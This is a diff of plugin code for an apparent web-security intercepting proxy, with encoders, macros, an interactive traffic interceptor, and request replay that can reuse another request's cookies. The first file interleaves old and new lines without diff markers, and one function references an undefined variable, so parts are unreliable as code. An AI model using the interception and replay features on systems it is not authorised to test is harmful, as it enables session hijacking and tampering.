return ''.join(['&#x{0:x};'.format(ord(c)) for c in s])
return ''.join(['&#x{0:x};'.format(c) for c in s]).encode()
def html_decode_helper(s):
return HTMLParser.HTMLParser().unescape(s)
return html.unescape(s.decode()).encode()
def _code_helper(line, func, copy=True):
args = shlex.split(line)
if not args:
s = clipboard_contents()
print 'Will decode:'
print printable_data(s)
def _code_helper(args, func, copy=True):
if len(args) == 0:
s = clipboard_contents().encode()
print('Will decode:')
print(printable_data(s))
s = func(s)
if copy:
try:
copy_to_clipboard(s)
except:
print 'Result cannot be copied to the clipboard. Result not copied.'
except Exception as e:
print('Result cannot be copied to the clipboard. Result not copied.')
raise e
return s
else:
s = func(args[0].strip())
s = func(args[0].encode())
if copy:
try:
copy_to_clipboard(s)
except:
print 'Result cannot be copied to the clipboard. Result not copied.'
except Exception as e:
print('Result cannot be copied to the clipboard. Result not copied.')
raise e
return s
def base64_decode(line):
def base64_decode(client, args):
"""
Base64 decode a string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, base64_decode_helper))
print_maybe_bin(_code_helper(args, base64_decode_helper))
def base64_encode(line):
def base64_encode(client, args):
"""
Base64 encode a string.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, base64.b64encode))
print_maybe_bin(_code_helper(args, base64.b64encode))
def url_decode(line):
def url_decode(client, args):
"""
URL decode a string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, urllib.unquote))
print_maybe_bin(_code_helper(args, url_decode_helper))
def url_encode(line):
def url_encode(client, args):
"""
URL encode special characters in a string.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, urllib.quote_plus))
print_maybe_bin(_code_helper(args, url_encode_helper))
def asciihex_decode(line):
def asciihex_decode(client, args):
"""
Decode an ascii hex string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, asciihex_decode_helper))
print_maybe_bin(_code_helper(args, asciihex_decode_helper))
def asciihex_encode(line):
def asciihex_encode(client, args):
"""
Convert all the characters in a line to hex and combine them.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, asciihex_encode_helper))
print_maybe_bin(_code_helper(args, asciihex_encode_helper))
def html_decode(line):
def html_decode(client, args):
"""
Decode an html encoded string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, html_decode_helper))
print_maybe_bin(_code_helper(args, html_decode_helper))
def html_encode(line):
def html_encode(client, args):
"""
Encode a string and escape html control characters.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, html_encode_helper))
print_maybe_bin(_code_helper(args, html_encode_helper))
def gzip_decode(line):
def gzip_decode(client, args):
"""
Un-gzip a string.
If no string is given, will decompress the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, gzip_decode_helper))
print_maybe_bin(_code_helper(args, gzip_decode_helper))
def gzip_encode(line):
def gzip_encode(client, args):
"""
Gzip a string.
If no string is given, will decompress the contents of the clipboard.
Results are NOT copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, gzip_encode_helper, copy=False))
print_maybe_bin(_code_helper(args, gzip_encode_helper, copy=False))
def base64_decode_raw(line):
def base64_decode_raw(client, args):
"""
Same as base64_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, base64_decode_helper, copy=False)
print(_code_helper(args, base64_decode_helper, copy=False))
def base64_encode_raw(line):
def base64_encode_raw(client, args):
"""
Same as base64_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, base64.b64encode, copy=False)
print(_code_helper(args, base64.b64encode, copy=False))
def url_decode_raw(line):
def url_decode_raw(client, args):
"""
Same as url_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, urllib.unquote, copy=False)
print(_code_helper(args, url_decode_helper, copy=False))
def url_encode_raw(line):
def url_encode_raw(client, args):
"""
Same as url_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, urllib.quote_plus, copy=False)
print(_code_helper(args, url_encode_helper, copy=False))
def asciihex_decode_raw(line):
def asciihex_decode_raw(client, args):
"""
Same as asciihex_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, asciihex_decode_helper, copy=False)
print(_code_helper(args, asciihex_decode_helper, copy=False))
def asciihex_encode_raw(line):
def asciihex_encode_raw(client, args):
"""
Same as asciihex_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, asciihex_encode_helper, copy=False)
print(_code_helper(args, asciihex_encode_helper, copy=False))
def html_decode_raw(line):
def html_decode_raw(client, args):
"""
Same as html_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, html_decode_helper, copy=False)
print(_code_helper(args, html_decode_helper, copy=False))
def html_encode_raw(line):
def html_encode_raw(client, args):
"""
Same as html_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, html_encode_helper, copy=False)
print(_code_helper(args, html_encode_helper, copy=False))
def gzip_decode_raw(line):
def gzip_decode_raw(client, args):
"""
Same as gzip_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, gzip_decode_helper, copy=False)
print(_code_helper(args, gzip_decode_helper, copy=False))
def gzip_encode_raw(line):
def gzip_encode_raw(client, args):
"""
Same as gzip_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, gzip_encode_helper, copy=False)
print(_code_helper(args, gzip_encode_helper, copy=False))
def unix_time_decode_helper(line):
unix_time = int(line.strip())
dtime = datetime.datetime.fromtimestamp(unix_time)
return dtime.strftime('%Y-%m-%d %H:%M:%S')
def unix_time_decode(line):
print _code_helper(line, unix_time_decode_helper)
def unix_time_decode(client, args):
print(_code_helper(args, unix_time_decode_helper))
def http_auth_encode(client, args):
if len(args) != 2:
raise CommandError('Usage: http_auth_encode <username> <password>')
username, password = args
print(encode_basic_auth(username, password))
def http_auth_decode(client, args):
username, password = decode_basic_auth(args[0])
print(username)
print(password)
def load_cmds(cmd):
cmd.set_cmds({
@ -275,6 +296,8 @@ def load_cmds(cmd):
'gzip_decode_raw': (gzip_decode_raw, None),
'gzip_encode_raw': (gzip_encode_raw, None),
'unixtime_decode': (unix_time_decode, None),
'httpauth_encode': (http_auth_encode, None),
'httpauth_decode': (http_auth_decode, None)
})
cmd.add_aliases([
('base64_decode', 'b64d'),
@ -298,4 +321,6 @@ def load_cmds(cmd):
('gzip_decode_raw', 'gzdr'),
('gzip_encode_raw', 'gzer'),
('unixtime_decode', 'uxtd'),
('httpauth_encode', 'hae'),
('httpauth_decode', 'had'),
])

View file

@ -0,0 +1,150 @@
from ..util import load_reqlist
from ..macros import macro_from_requests, MacroTemplate, load_macros
from ..colors import Colors
macro_dict = {}
int_macro_dict = {}
int_conns = {}
def generate_macro(client, args):
if len(args) == 0:
print("usage: gma [name] [reqids]")
return
macro_name = args[0]
reqs = [r for r in load_reqlist(client, ','.join(args[1:]))]
script_string = macro_from_requests(reqs)
fname = MacroTemplate.template_filename('macro', macro_name)
with open(fname, 'w') as f:
f.write(script_string)
print("Macro written to {}".format(fname))
def generate_int_macro(client, args):
if len(args) == 0:
print("usage: gima [name] [reqids]")
return
macro_name = args[0]
reqs = [r for r in load_reqlist(client, ','.join(args[1:]))]
script_string = macro_from_requests(reqs, template='intmacro')
fname = MacroTemplate.template_filename('intmacro', macro_name)
with open(fname, 'w') as f:
f.write(script_string)
print("Macro written to {}".format(fname))
def load_macros_cmd(client, args):
global macro_dict
load_dir = '.'
if len(args) > 0:
load_dir = args[0]
_stop_all_int_macros()
loaded_macros, loaded_int_macros = load_macros(load_dir, client)
for macro in loaded_macros:
macro_dict[macro.name] = macro
print("Loaded {} ({})".format(macro.name, macro.file_name))
for macro in loaded_int_macros:
int_macro_dict[macro.name] = macro
print("Loaded {} ({})".format(macro.name, macro.file_name))
def complete_run_macro(text, line, begidx, endidx):
from ..util import autocomplete_starts_with
global macro_dict
strs = macro_dict.keys()
return autocomplete_startswith(text, strs)
def run_macro(client, args):
global macro_dict
if len(args) == 0:
print("usage: rma [macro name]")
return
macro = macro_dict[args[0]]
macro.execute(client, args[1:])
def complete_run_int_macro(text, line, begidx, endidx):
from ..util import autocomplete_starts_with
global int_macro_dict
strs = int_macro_dict.keys()
return autocomplete_startswith(text, strs)
def run_int_macro(client, args):
global int_macro_dict
global int_conns
if len(args) == 0:
print("usage: rim [macro name]")
return
if args[0] in int_conns:
print("%s is already running!" % args[0])
return
macro = int_macro_dict[args[0]]
macro.init(args[1:])
conn = client.new_conn()
int_conns[args[0]] = conn
conn.intercept(macro)
print("Started %s" % args[0])
def complete_stop_int_macro(text, line, begidx, endidx):
from ..util import autocomplete_starts_with
global int_conns
strs = int_conns.keys()
return autocomplete_startswith(text, strs)
def stop_int_macro(client, args):
global int_conns
if len(args) > 0:
conn = int_conns[args[0]]
conn.close()
del int_conns[args[0]]
print("Stopped %s" % args[0])
else:
_stop_all_int_macros()
def _stop_all_int_macros():
global int_conns
for k, conn in int_conns.items():
conn.close()
del int_conns[k]
print("Stopped %s" % k)
def list_macros(client, args):
global macro_dict
global int_macro_dict
global int_conns
if len(macro_dict) > 0:
print('Loaded Macros:')
for k, m in macro_dict.items():
print(' '+k)
if len(int_macro_dict) > 0:
print('Loaded Intercepting Macros:')
for k, m in int_macro_dict.items():
pstr = ' '+k
if k in int_conns:
pstr += ' (' + Colors.GREEN + 'RUNNING' + Colors.ENDC + ')'
print(pstr)
def load_cmds(cmd):
cmd.set_cmds({
'generate_macro': (generate_macro, None),
'generate_int_macro': (generate_int_macro, None),
'load_macros': (load_macros_cmd, None),
'run_macro': (run_macro, complete_run_macro),
'run_int_macro': (run_int_macro, complete_run_int_macro),
'stop_int_macro': (stop_int_macro, complete_stop_int_macro),
'list_macros': (list_macros, None),
})
cmd.add_aliases([
('generate_macro', 'gma'),
('generate_int_macro', 'gima'),
('load_macros', 'lma'),
('run_macro', 'rma'),
('run_int_macro', 'rim'),
('stop_int_macro', 'sim'),
('list_macros', 'lsma'),
])

View file

@ -0,0 +1,325 @@
import curses
import os
import subprocess
import tempfile
import threading
from ..macros import InterceptMacro
from ..proxy import MessageError, parse_request, parse_response
from ..colors import url_formatter
edit_queue = []
class InterceptorMacro(InterceptMacro):
"""
A class representing a macro that modifies requests as they pass through the
proxy
"""
def __init__(self):
InterceptMacro.__init__(self)
self.name = "InterceptorMacro"
def mangle_request(self, request):
# This function gets called to mangle/edit requests passed through the proxy
# Write original request to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.full_message())
mangled_req = request
front = False
while True:
# Have the console edit the file
event = edit_file(tfName, front=front)
event.wait()
if event.canceled:
return request
# Create new mangled request from edited file
with open(tfName, 'rb') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
return None
try:
mangled_req = parse_request(text)
except MessageError as e:
print("could not parse request: %s" % str(e))
front = True
continue
mangled_req.dest_host = request.dest_host
mangled_req.dest_port = request.dest_port
mangled_req.use_tls = request.use_tls
break
return mangled_req
def mangle_response(self, request, response):
# This function gets called to mangle/edit respones passed through the proxy
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(response.full_message())
mangled_rsp = response
while True:
# Have the console edit the file
event = edit_file(tfName, front=True)
event.wait()
if event.canceled:
return response
# Create new mangled response from edited file
with open(tfName, 'rb') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
return None
try:
mangled_rsp = parse_response(text)
except MessageError as e:
print("could not parse response: %s" % str(e))
front = True
continue
break
return mangled_rsp
def mangle_websocket(self, request, response, message):
# This function gets called to mangle/edit respones passed through the proxy
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(b"# ")
if message.to_server:
tf.write(b"OUTGOING to")
else:
tf.write(b"INCOMING from")
desturl = 'ws' + url_formatter(request)[4:] # replace http:// with ws://
tf.write(b' ' + desturl.encode())
tf.write(b" -- Note that this line is ignored\n")
tf.write(message.message)
mangled_msg = message
while True:
# Have the console edit the file
event = edit_file(tfName, front=True)
event.wait()
if event.canceled:
return message
# Create new mangled response from edited file
with open(tfName, 'rb') as f:
text = f.read()
_, text = text.split(b'\n', 1)
os.remove(tfName)
# Check if dropped
if text == '':
return None
mangled_msg.message = text
# if messages can be invalid, check for it here and continue if invalid
break
return mangled_msg
class EditEvent:
def __init__(self):
self.e = threading.Event()
self.canceled = False
def wait(self):
self.e.wait()
def set(self):
self.e.set()
def cancel(self):
self.canceled = True
self.set()
###############
## Helper funcs
def edit_file(fname, front=False):
global edit_queue
# Adds the filename to the edit queue. Returns an event that is set once
# the file is edited and the editor is closed
#e = threading.Event()
e = EditEvent()
if front:
edit_queue = [(fname, e, threading.current_thread())] + edit_queue
else:
edit_queue.append((fname, e, threading.current_thread()))
return e
def execute_repeater(client, reqid):
#script_loc = os.path.join(pappy.session.config.pappy_dir, "plugins", "vim_repeater", "repeater.vim")
maddr = client.maddr
if maddr is None:
print("Client has no message address, cannot run repeater")
return
storage, reqid = client.parse_reqid(reqid)
script_loc = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"repeater", "repeater.vim")
args = (["vim", "-S", script_loc, "-c", "RepeaterSetup %s %s %s"%(reqid, storage.storage_id, client.maddr)])
subprocess.call(args)
class CloudToButt(InterceptMacro):
def __init__(self):
InterceptMacro.__init__(self)
self.name = 'cloudtobutt'
self.intercept_requests = True
self.intercept_responses = True
self.intercept_ws = True
def mangle_response(self, request, response):
response.body = response.body.replace(b"cloud", b"butt")
response.body = response.body.replace(b"Cloud", b"Butt")
return response
def mangle_request(self, request):
request.body = request.body.replace(b"foo", b"bar")
request.body = request.body.replace(b"Foo", b"Bar")
return request
def mangle_websocket(self, request, response, wsm):
wsm.message = wsm.message.replace(b"world", b"zawarudo")
wsm.message = wsm.message.replace(b"zawarudo", b"ZAWARUDO")
return wsm
def repeater(client, args):
"""
Open a request in the repeater
Usage: repeater <reqid>
"""
# This is not async on purpose. start_editor acts up if this is called
# with inline callbacks. As a result, check_reqid and get_unmangled
# cannot be async
reqid = args[0]
req = client.req_by_id(reqid)
execute_repeater(client, reqid)
def intercept(client, args):
"""
Intercept requests and/or responses and edit them with before passing them along
Usage: intercept <reqid>
"""
global edit_queue
req_names = ('req', 'request', 'requests')
rsp_names = ('rsp', 'response', 'responses')
ws_names = ('ws', 'websocket')
mangle_macro = InterceptorMacro()
if any(a in req_names for a in args):
mangle_macro.intercept_requests = True
if any(a in rsp_names for a in args):
mangle_macro.intercept_responses = True
if any(a in ws_names for a in args):
mangle_macro.intercept_ws = True
if not args:
mangle_macro.intercept_requests = True
intercepting = []
if mangle_macro.intercept_requests:
intercepting.append('Requests')
if mangle_macro.intercept_responses:
intercepting.append('Responses')
if mangle_macro.intercept_ws:
intercepting.append('Websocket Messages')
if not mangle_macro.intercept_requests and not mangle_macro.intercept_responses and not mangle_macro.intercept_ws:
intercept_str = 'NOTHING WHY ARE YOU DOING THIS' # WHYYYYYYYY
else:
intercept_str = ', '.join(intercepting)
## Interceptor loop
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
stdscr.nodelay(True)
conn = client.new_conn()
try:
conn.intercept(mangle_macro)
editnext = False
while True:
stdscr.addstr(0, 0, "Currently intercepting: %s" % intercept_str)
stdscr.clrtoeol()
stdscr.addstr(1, 0, "%d item(s) in queue." % len(edit_queue))
stdscr.clrtoeol()
if editnext:
stdscr.addstr(2, 0, "Waiting for next item... Press 'q' to quit or 'b' to quit waiting")
else:
stdscr.addstr(2, 0, "Press 'n' to edit the next item or 'q' to quit interceptor.")
stdscr.clrtoeol()
c = stdscr.getch()
if c == ord('q'):
return
elif c == ord('n'):
editnext = True
elif c == ord('b'):
editnext = False
if editnext and edit_queue:
editnext = False
(to_edit, event, t) = edit_queue.pop(0)
editor = 'vi'
if 'EDITOR' in os.environ:
editor = os.environ['EDITOR']
additional_args = []
if editor == 'vim':
# prevent adding additional newline
additional_args.append('-b')
subprocess.call([editor, to_edit] + additional_args)
stdscr.clear()
event.set()
t.join()
finally:
conn.close()
# Now that the connection is closed, make sure the rest of the threads finish/error out
while len(edit_queue) > 0:
(fname, event, t) = edit_queue.pop(0)
event.cancel()
t.join()
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
###############
## Plugin hooks
def test_macro(client, args):
c2b = CloudToButt()
conn = client.new_conn()
with client.new_conn() as conn:
conn.intercept(c2b)
print("intercept started")
input("Press enter to quit...")
print("past raw input")
def load_cmds(cmd):
cmd.set_cmds({
'intercept': (intercept, None),
'c2b': (test_macro, None),
'repeater': (repeater, None),
})
cmd.add_aliases([
('intercept', 'ic'),
('repeater', 'rp'),
])

View file

@ -0,0 +1,187 @@
import argparse
import sys
import tempfile
import subprocess
from ..util import copy_to_clipboard, confirm, printable_data, Capturing, load_reqlist
from ..console import CommandError
from ..proxy import InterceptMacro
from ..colors import url_formatter, verb_color, Colors, scode_color
class WatchMacro(InterceptMacro):
def __init__(self, client):
InterceptMacro.__init__(self)
self.name = "WatchMacro"
self.client = client
def mangle_request(self, request):
if self.client.is_in_context(request):
printstr = "> "
printstr += verb_color(request.method) + request.method + Colors.ENDC + " "
printstr += url_formatter(request, colored=True)
print(printstr)
return request
def mangle_response(self, request, response):
if self.client.is_in_context(request):
printstr = "< "
printstr += verb_color(request.method) + request.method + Colors.ENDC + ' '
printstr += url_formatter(request, colored=True)
printstr += " \u2192 "
response_code = str(response.status_code) + ' ' + response.reason
response_code = scode_color(response_code) + response_code + Colors.ENDC
printstr += response_code
print(printstr)
return response
def mangle_websocket(self, request, response, message):
if self.client.is_in_context(request):
printstr = ""
if message.to_server:
printstr += ">"
else:
printstr += "<"
printstr += "ws(b={}) ".format(message.is_binary)
printstr += printable_data(message.message)
print(printstr)
return message
def message_address(client, args):
msg_addr = client.maddr
if msg_addr is None:
print("Client has no message address")
return
print(msg_addr)
if len(args) > 0 and args[0] == "-c":
try:
copy_to_clipboard(msg_addr.encode())
print("Copied to clipboard!")
except:
print("Could not copy address to clipboard")
def ping(client, args):
print(client.ping())
def watch(client, args):
macro = WatchMacro(client)
macro.intercept_requests = True
macro.intercept_responses = True
macro.intercept_ws = True
with client.new_conn() as conn:
conn.intercept(macro)
print("Watching requests. Press <Enter> to quit...")
input()
def submit(client, cargs):
"""
Resubmit some requests, optionally with modified headers and cookies.
Usage: submit <reqid(s)> [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
"""
#Usage: submit reqids [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
if len(cargs) == 0:
raise CommandError("Missing request id(s)")
parser = argparse.ArgumentParser(prog="submit", usage=submit.__doc__)
#parser.add_argument('reqids')
parser.add_argument('-m', '--inmem', action='store_true', help='Store resubmitted requests in memory without storing them in the data file')
parser.add_argument('-u', '--unique', action='store_true', help='Only resubmit one request per endpoint (different URL parameters are different endpoints)')
parser.add_argument('-p', '--uniquepath', action='store_true', help='Only resubmit one request per endpoint (ignoring URL parameters)')
parser.add_argument('-c', '--cookies', nargs='*', help='Apply a cookie to requests before submitting')
parser.add_argument('-d', '--headers', nargs='*', help='Apply a header to requests before submitting')
parser.add_argument('-o', '--copycookies', help='Copy the cookies used in another request')
reqids = cargs[0]
args = parser.parse_args(cargs[1:])
headers = {}
cookies = {}
clear_cookies = False
if args.headers:
for h in args.headers:
k, v = h.split('=', 1)
headers[k] = v
if args.copycookies:
reqid = args.copycookies
req = client.req_by_id(reqid)
clear_cookies = True
for k, v in req.cookie_iter():
cookies[k] = v
if args.cookies:
for c in args.cookies:
k, v = c.split('=', 1)
cookies[k] = v
if args.unique and args.uniquepath:
raise CommandError('Both -u and -p cannot be given as arguments')
# Get requests to submit
#reqs = [r.copy() for r in client.in_context_requests()]
reqs = client.in_context_requests()
# Apply cookies and headers
for req in reqs:
if clear_cookies:
req.headers.delete("Cookie")
for k, v in cookies.items():
req.set_cookie(k, v)
for k, v in headers.items():
req.headers.set(k, v)
conf_message = "You're about to submit %d requests, continue?" % len(reqs)
if not confirm(conf_message):
return
# Filter unique paths
if args.uniquepath or args.unique:
endpoints = set()
new_reqs = []
for r in reqs:
if unique_path_and_args:
s = r.url.geturl()
else:
s = r.url.geturl(include_params=False)
if not s in endpoints:
new_reqs.append(r)
endpoints.add(s)
reqs = new_reqs
# Tag and send them
for req in reqs:
req.tags.add('resubmitted')
sys.stdout.write(client.get_reqid(req) + " ")
sys.stdout.flush()
storage = client.disk_storage.storage_id
if args.inmem:
storage = client.inmem_storage.storage_id
client.submit(req, storage=storage)
sys.stdout.write("\n")
sys.stdout.flush()
def run_with_less(client, args):
with Capturing() as output:
client.console.run_args(args)
with tempfile.NamedTemporaryFile() as tf:
tf.write(output.val.encode())
subprocess.call(['less', '-R', tf.name])
def load_cmds(cmd):
cmd.set_cmds({
'maddr': (message_address, None),
'ping': (ping, None),
'submit': (submit, None),
'watch': (watch, None),
'less': (run_with_less, None),
})

File diff suppressed because it is too large Load diff

View file

@ -0,0 +1,64 @@
from ..console import CommandError
from ..util import confirm, load_reqlist
def tag_cmd(client, args):
if len(args) == 0:
raise CommandError("Usage: tag <tag> [reqid1] [reqid2] ...")
if not args[0]:
raise CommandError("Tag cannot be empty")
tag = args[0]
if len(args) == 1:
reqids = '*'
else:
reqids = ','.join(args[1:])
reqs = [r for r in load_reqlist(client, reqids, headers_only=True)]
if len(reqs) > 10:
cnt = confirm("You are about to tag {} requests with \"{}\". Continue?".format(len(reqs), tag))
if not cnt:
return
for reqh in reqs:
reqid = client.get_reqid(reqh)
client.add_tag(reqid, tag)
def untag_cmd(client, args):
if len(args) == 0:
raise CommandError("Usage: untag <tag> [reqid1] [reqid2] ...")
if not args[0]:
raise CommandError("Tag cannot be empty")
tag = args[0]
if len(args) == 1:
reqids = '*'
else:
reqids = ','.join(args[1:])
reqs = [r for r in load_reqlist(client, reqids, headers_only=True)]
if len(reqs) > 10:
cnt = confirm("You are about to remove the \"{}\" tag from {} requests. Continue?".format(tag, len(reqs)))
if not cnt:
return
for reqh in reqs:
reqid = client.get_reqid(reqh)
client.remove_tag(reqid, tag)
def clrtag_cmd(client, args):
if len(args) == 0:
raise CommandError("Usage: clrtag [reqid1] [reqid2] ...")
reqids = []
if len(args) == 1:
reqids = '*'
else:
reqids = ','.join(args[1:])
reqs = [r for r in load_reqlist(client, reqids, headers_only=True)]
if len(reqs) > 5:
cnt = confirm("You are about to clear ALL TAGS from {} requests. Continue?".format(len(reqs)))
if not cnt:
return
for reqh in reqs:
reqid = client.get_reqid(reqh)
client.clear_tag(reqid)
def load_cmds(cmd):
cmd.set_cmds({
'clrtag': (clrtag_cmd, None),
'untag': (untag_cmd, None),
'tag': (tag_cmd, None),
})

View file

@ -0,0 +1,7 @@
def test_cmd(client, args):
print("args:", ', '.join(args))
print("ping:", client.ping())
def load_cmds(cons):
cons.set_cmd("test", test_cmd)

View file

@ -0,0 +1,741 @@
import datetime
import json
import pygments
import pprint
import re
import shlex
import urllib
from ..util import print_table, print_request_rows, get_req_data_row, datetime_string, maybe_hexdump, load_reqlist
from ..colors import Colors, Styles, verb_color, scode_color, path_formatter, color_string, url_formatter, pretty_msg, pretty_headers
from ..console import CommandError
from pygments.formatters import TerminalFormatter
from pygments.lexers.data import JsonLexer
from pygments.lexers.html import XmlLexer
from urllib.parse import parse_qs, unquote
###################
## Helper functions
def view_full_message(request, headers_only=False, try_ws=False):
def _print_message(mes):
print_str = ''
if mes.to_server == False:
print_str += Colors.BLUE
print_str += '< Incoming'
else:
print_str += Colors.GREEN
print_str += '> Outgoing'
print_str += Colors.ENDC
if mes.unmangled:
print_str += ', ' + Colors.UNDERLINE + 'mangled' + Colors.ENDC
t_plus = "??"
if request.time_start:
t_plus = mes.timestamp - request.time_start
print_str += ', binary = %s, T+%ss\n' % (mes.is_binary, t_plus.total_seconds())
print_str += Colors.ENDC
print_str += maybe_hexdump(mes.message).decode()
print_str += '\n'
return print_str
if headers_only:
print(pretty_headers(request))
else:
if try_ws and request.ws_messages:
print_str = ''
print_str += Styles.TABLE_HEADER
print_str += "Websocket session handshake\n"
print_str += Colors.ENDC
print_str += pretty_msg(request)
print_str += '\n'
print_str += Styles.TABLE_HEADER
print_str += "Websocket session \n"
print_str += Colors.ENDC
for wsm in request.ws_messages:
print_str += _print_message(wsm)
if wsm.unmangled:
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += ' vv UNMANGLED vv '
print_str += Colors.YELLOW
print_str += '-'*10
print_str += Colors.ENDC
print_str += '\n'
print_str += _print_message(wsm.unmangled)
print_str += Colors.YELLOW
print_str += '-'*20 + '-'*len(' ^^ UNMANGLED ^^ ')
print_str += '\n'
print_str += Colors.ENDC
print(print_str)
else:
print(pretty_msg(request))
def print_request_extended(client, request):
# Prints extended info for the request
title = "Request Info (reqid=%s)" % client.get_reqid(request)
print(Styles.TABLE_HEADER + title + Colors.ENDC)
reqlen = len(request.body)
reqlen = '%d bytes' % reqlen
rsplen = 'No response'
mangle_str = 'Nothing mangled'
if request.unmangled:
mangle_str = 'Request'
if request.response:
response_code = str(request.response.status_code) + \
' ' + request.response.reason
response_code = scode_color(response_code) + response_code + Colors.ENDC
rsplen = request.response.content_length
rsplen = '%d bytes' % rsplen
if request.response.unmangled:
if mangle_str == 'Nothing mangled':
mangle_str = 'Response'
else:
mangle_str += ' and Response'
else:
response_code = ''
time_str = '--'
if request.time_end is not None and request.time_start is not None:
time_delt = request.time_end - request.time_start
time_str = "%.2f sec" % time_delt.total_seconds()
if request.use_tls:
is_ssl = 'YES'
else:
is_ssl = Colors.RED + 'NO' + Colors.ENDC
if request.time_start:
time_made_str = datetime_string(request.time_start)
else:
time_made_str = '--'
verb = verb_color(request.method) + request.method + Colors.ENDC
host = color_string(request.dest_host)
colored_tags = [color_string(t) for t in request.tags]
print_pairs = []
print_pairs.append(('Made on', time_made_str))
print_pairs.append(('ID', client.get_reqid(request)))
print_pairs.append(('URL', url_formatter(request, colored=True)))
print_pairs.append(('Host', host))
print_pairs.append(('Path', path_formatter(request.url.path)))
print_pairs.append(('Verb', verb))
print_pairs.append(('Status Code', response_code))
print_pairs.append(('Request Length', reqlen))
print_pairs.append(('Response Length', rsplen))
if request.response and request.response.unmangled:
print_pairs.append(('Unmangled Response Length', request.response.unmangled.content_length))
print_pairs.append(('Time', time_str))
print_pairs.append(('Port', request.dest_port))
print_pairs.append(('SSL', is_ssl))
print_pairs.append(('Mangled', mangle_str))
print_pairs.append(('Tags', ', '.join(colored_tags)))
for k, v in print_pairs:
print(Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v))
def pretty_print_body(fmt, body):
try:
bstr = body.decode()
if fmt.lower() == 'json':
d = json.loads(bstr.strip())
s = json.dumps(d, indent=4, sort_keys=True)
print(pygments.highlight(s, JsonLexer(), TerminalFormatter()))
elif fmt.lower() == 'form':
qs = parse_qs(bstr, keep_blank_values=True)
for k, vs in qs.items():
for v in vs:
s = Colors.GREEN
s += '%s: ' % unquote(k)
s += Colors.ENDC
if v == '':
s += Colors.RED
s += 'EMPTY'
s += Colors.ENDC
else:
s += unquote(v)
print(s)
elif fmt.lower() == 'text':
print(bstr)
elif fmt.lower() == 'xml':
import xml.dom.minidom
xml = xml.dom.minidom.parseString(bstr)
print(pygments.highlight(xml.toprettyxml(), XmlLexer(), TerminalFormatter()))
else:
raise CommandError('"%s" is not a valid format' % fmt)
except CommandError as e:
raise e
except Exception as e:
raise CommandError('Body could not be parsed as "{}": {}'.format(fmt, e))
def print_params(client, req, params=None):
if not req.url.parameters() and not req.body:
print('Request %s has no url or data parameters' % client.get_reqid(req))
print('')
if req.url.parameters():
print(Styles.TABLE_HEADER + "Url Params" + Colors.ENDC)
for k, v in req.url.param_iter():
if params is None or (params and k in params):
print(Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v))
print('')
if req.body:
print(Styles.TABLE_HEADER + "Body/POST Params" + Colors.ENDC)
pretty_print_body(guess_pretty_print_fmt(req), req.body)
print('')
if 'cookie' in req.headers:
print(Styles.TABLE_HEADER + "Cookies" + Colors.ENDC)
for k, v in req.cookie_iter():
if params is None or (params and k in params):
print(Styles.KV_KEY+str(k)+': '+Styles.KV_VAL+str(v))
print('')
# multiform request when we support it
def guess_pretty_print_fmt(msg):
if 'content-type' in msg.headers:
if 'json' in msg.headers.get('content-type'):
return 'json'
elif 'www-form' in msg.headers.get('content-type'):
return 'form'
elif 'application/xml' in msg.headers.get('content-type'):
return 'xml'
return 'text'
def print_tree(tree):
# Prints a tree. Takes in a sorted list of path tuples
_print_tree_helper(tree, 0, [])
def _get_tree_prefix(depth, print_bars, last):
if depth == 0:
return u''
else:
ret = u''
pb = print_bars + [True]
for i in range(depth):
if pb[i]:
ret += u'\u2502 '
else:
ret += u' '
if last:
ret += u'\u2514\u2500 '
else:
ret += u'\u251c\u2500 '
return ret
def _print_tree_helper(tree, depth, print_bars):
